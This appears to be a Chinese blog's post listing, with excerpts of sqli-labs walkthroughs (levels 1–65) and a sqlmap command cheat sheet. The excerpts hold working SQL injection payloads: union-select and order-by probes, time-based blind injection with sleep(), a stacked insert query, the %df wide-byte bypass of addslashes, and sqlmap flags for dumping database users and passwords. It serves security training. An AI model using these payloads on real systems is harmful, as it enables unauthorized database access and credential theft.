- 博客(6)
- 收藏
- 关注
RSS订阅原创 sqlmap常用命令和下载
sqlmap详细命令:–is-dba 当前用户权限(是否为root权限)–dbs 所有数据库–current-db 网站当前数据库–users 所有数据库用户–current-user 当前数据库用户–random-agent 构造随机user-agent–passwords 数据库密码–proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理–time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)**sqlmap的安装需要py
2020-09-26 17:25:13
375
原创 sql注入41-65题
Less-41本关没有回显位也无报错,所以我们用盲注。且为数字型注入,不需要闭合。采用时间盲注——查询本地数据库:?id=1 and if(ascii(substr((select database()),1,1))>98,sleep(5),1)Less-42sql语句为我们先把SQL语句闭合,然后创表,建数据c’; insert into less42 (username,p...
2020-02-22 22:16:38
186
原创 sql注入31-40题
31题与上一题相同,只是闭合方式为")闭合;32题该题用了addslashes()函数的作用是:在 单引号 ',双引号 ",反斜杠 \还有NULL前面加上反斜杠\。所以我们可以用加上%df或%E6的方法来进行注入。在gbk编码中两个字节代表一个汉字,所以在编码时,%df和后面的\也就是%5c变成了一个汉字 運,而单引号 ‘逃逸了出来。爆列名时,‘user’,这里的单引号可以用十六进制...
2020-02-15 20:07:16
250
原创 sql注入21-30
Less21-3021题先登录进去,页面是这样的这个完全看不懂,然后只能看源代码了,这个可以看出这关为’)闭合方式;并且为cookie注入,去看标题cookie injection - base64 encoded - single quotes and parenthesis,然后发现要使用base64编码,base64编码在线加密解密:http://tool.oschina....
2020-02-08 22:04:13
188
原创 sql注入11-20题
Less 11-20题11关先输入1‘or 1=1–+发现为单引号闭合登录成功单引号闭合。2.?id=-1’ order by 3–+ 找有多少个字段。输入2时页面正常,所以字段数是2个;然后用联合注入,具体如下:(1).爆数据库名?id=-1’ union select 1,(select database()),3–+(2).爆表名?id=-1’ union selec...
2020-02-08 20:18:34
271
原创 sql注入1-10题
sql注入Less-1-10题首先输入?id=1观察页面,发现能登陆,使用联合注入(1) 查找几个字段(需输入错误id)?id=0‘ order by 3–+页面正常输入?id=0‘ order by 4–+页面错误,说明有三个字段(2) 爆数据库名?id=0’ union select 1,(select database()),3–+爆出数据库名 security。(...
2020-02-08 19:52:00
639
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人